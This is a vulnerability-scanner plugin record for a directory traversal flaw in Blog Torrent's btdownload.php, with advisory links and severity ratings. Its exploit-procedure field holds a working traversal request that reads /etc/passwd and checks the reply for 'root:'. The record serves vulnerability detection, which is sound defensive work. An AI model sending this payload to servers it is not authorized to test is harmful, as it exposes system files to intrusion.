<plugin_id>302</plugin_id>
<plugin_name>Blog Torrent btdownload.php directory traversal</plugin_name>
<plugin_family>HTTP</plugin_family>
<plugin_created_date>2005/01/04</plugin_created_date>
<plugin_created_name>Marc Ruef</plugin_created_name>
<plugin_created_email>marc.ruef at computec.ch</plugin_created_email>
<plugin_created_web>http://www.computec.ch</plugin_created_web>
<plugin_created_company>computec.ch</plugin_created_company>
<plugin_version>1.0</plugin_version>
<plugin_protocol>tcp</plugin_protocol>
<plugin_port>80</plugin_port>
<plugin_procedure_exploit>open|send GET /btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.0\n\n|sleep|close|pattern_exists root:</plugin_procedure_exploit>
<plugin_exploit_accuracy>98</plugin_exploit_accuracy>
<plugin_comment>The NASL script is Copyright (C) Tenable Network Security.</plugin_comment>
<bug_advisory>http://www.securityfocus.com/archive/1/383048</bug_advisory>
<bug_vulnerability_class>Directory Traversal</bug_vulnerability_class>
<bug_description>There is a remote directory traversal vulnerability in Blog Torrent, a Web based application that allows users to host files for Bit Torrents. A malicious user can leverage this issue by requesting files outside of the web-server root directory with directory traversal strings such as   '../'. This would allow a successful attacker to view arbitrary files that are readable by the web-server process.</bug_description>
<bug_fixing_time>Approx. 10 minutes</bug_fixing_time>
<bug_exploit_availability>Yes</bug_exploit_availability>
<bug_exploit_url>http://www.securityfocus.com/bid/11795/exploit/</bug_exploit_url>
<bug_remote>Yes</bug_remote>
<bug_local>Yes</bug_local>
<bug_severity>High</bug_severity>
<bug_popularity>6</bug_popularity>
<bug_simplicity>8</bug_simplicity>
<bug_impact>8</bug_impact>
<bug_risk>7</bug_risk>
<bug_nessus_risk>High</bug_nessus_risk>
<bug_check_tool>Nessus can check this flaw with the plugin 15904 (Blog Torrent Remote Directory Traversal).</bug_check_tool>
<source_securityfocus_bid>11795</source_securityfocus_bid>
<source_nessus_id>15904</source_nessus_id>
<source_literature>Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427</source_literature>
<source_misc>http://www.computec.ch</source_misc>


